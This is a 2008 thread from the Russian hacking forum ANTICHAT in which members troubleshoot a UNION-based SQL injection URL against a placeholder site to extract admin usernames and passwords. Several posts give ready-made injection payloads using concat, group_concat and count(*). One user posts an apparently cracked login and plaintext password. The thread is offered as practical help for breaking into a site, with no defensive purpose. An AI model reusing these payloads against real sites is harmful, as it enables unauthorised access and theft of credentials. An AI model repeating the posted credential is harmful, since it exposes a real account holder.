ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.12.2008, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Octave_Parango
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
|
|
|
27.12.2008, 16:37
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от Nightmarе
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
Пробовал, до полусотни докрутил.
|
|
|
|
27.12.2008, 16:43
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2Octave_Parango дык мож там тока одна запись?)
|
|
|
|
27.12.2008, 16:50
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
потому что таблица находится в другой базе
расшифровал хеш юзера, но почему то не заходит в аккаунт... (
login 1225532271
pass arnaud2007
name michamk
Странно..
|
|
|
|
27.12.2008, 16:56
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
j0ker13, что-то мне кажется, что так оно и есть.
|
|
|
|
27.12.2008, 17:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Octave_Parango:
проверь так:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
|
|
|
|
27.12.2008, 17:21
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от Pashkela
2 Octave_Parango:
проверь так:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
Отображается так же одна запись как и при limit 0,1
Получается там все одна запись?
|
|
|
|
27.12.2008, 17:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
да, 100%, иначе group_concat вытащил бы несколько записей по любому
и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.
Последний раз редактировалось Pashkela; 27.12.2008 в 17:30..
|
|
|
|
27.12.2008, 17:28
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Похоже на то...
|
|
|
|
27.12.2008, 17:30
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Я что-то пропустил. или count() отменили? )
Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
